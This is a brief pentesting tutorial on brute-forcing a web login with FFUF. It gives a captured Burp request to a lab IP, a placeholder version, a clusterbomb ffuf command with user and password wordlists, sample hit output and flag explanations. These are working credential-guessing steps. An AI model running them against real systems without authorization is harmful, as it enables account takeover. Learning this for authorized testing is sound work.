Use FFUF to Brute Force Login

Brute Force with a Request File

1. Start Burp
2. Make a randomized login to the target web page
3. Copy the output, for example:

POST /login HTTP/1.1
Host: 10.10.10.10
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json
Origin: http://10.10.10.10
Referer: http://10.10.10.10/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"username":"admin","password":"admin"}

4. Paste the contents into a file, for example request.txt
5. Replace the fields with placeholder text

POST /login HTTP/1.1
Host: 10.10.10.10
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json
Origin: http://10.10.10.10
Referer: http://10.10.10.10/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"username":"USERFUZZ","password":"PASSFUZZ"}

6. Save these contents to a file
7. Run FFUF in clusterbomb mode to bruteforce the login

ffuf -request request.txt -request-proto http -mode clusterbomb -w /path/to/users/file.txt:USERFUZZ -w /path/to/password/file.txt:PASSFUZZ -mc 200

[Status: 200, Size: 2, Words: 1, Lines: 1]
    * USERFUZZ: admin
    * PASSFUZZ: password

In this example, we are doing the following:

• -request request.txt is the example request for FFUF to follow
• -request-proto the protocol to use
• -mode clusterbomb use clusterbomb mode with the given inputs
• -w /path/to/users/file.txt:USERFUZZ insert the words from this word list in the "username":"USERFUZZ" placeholder
• -w /path/to/users/file.txt:PASSFUZZ insert the words from this word list in the "password":"PASSFUZZ" placeholder
• -mc 200 sucessful logins will match the HTTP 200 status code